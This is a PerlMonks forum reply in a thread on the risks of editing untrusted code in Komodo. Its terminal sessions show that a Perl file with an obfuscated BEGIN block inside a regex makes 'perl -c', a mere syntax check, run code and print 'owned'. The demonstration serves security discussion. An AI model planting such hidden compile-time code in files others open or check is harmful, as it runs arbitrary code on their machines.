Beefy Boxes and Bandwidth Generously Provided by pair Networks
Perl Monk, Perl Meditation
 
PerlMonks  

Re^2: Vulnerabilities when editing untrusted code... (Komodo)

by LanX (Saint)
on Jul 01, 2010 at 11:05 UTC ( [id://847492]=note: print w/replies, xml ) Need Help??

Help for this page

Select Code to Download


  1. or download this
    lanx@nc10-ubuntu:~$ cat >/tmp/tst.pl
    exit; ''=~('(?{B'.'EGIN{print "owned\n"}})')
    ...
    owned
    lanx@nc10-ubuntu:~$ perl -c /tmp/tst.pl
    /tmp/tst.pl syntax OK
    
  2. or download this
    lanx@nc10-ubuntu:/tmp$ cat >tst.pl
    exit; ''=~('(?{B'.'EGIN{print "owned"}})')
    ...
    lanx@nc10-ubuntu:/tmp$ perl -c tst.pl
    tst.pl syntax OK
    ownedlanx@nc10-ubuntu:/tmp$
    

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: note [id://847492]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others drinking their drinks and smoking their pipes about the Monastery: (5)
As of 2024-04-19 07:17 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found